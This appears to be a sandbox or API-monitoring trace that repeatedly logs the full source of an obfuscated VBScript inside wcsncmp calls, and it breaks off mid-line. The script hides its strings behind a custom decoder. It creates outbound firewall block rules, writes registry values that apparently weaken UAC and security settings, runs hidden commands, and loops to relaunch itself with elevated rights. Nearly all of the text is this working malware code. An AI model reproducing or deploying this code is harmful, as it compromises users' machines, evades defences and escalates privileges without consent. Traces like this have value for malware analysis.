bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0222.930] wcsncmp (_String1="\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0222.930] wcsncmp (_String1="\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.930] wcsncmp (_String1="id = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.930] wcsncmp (_String1="d = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), 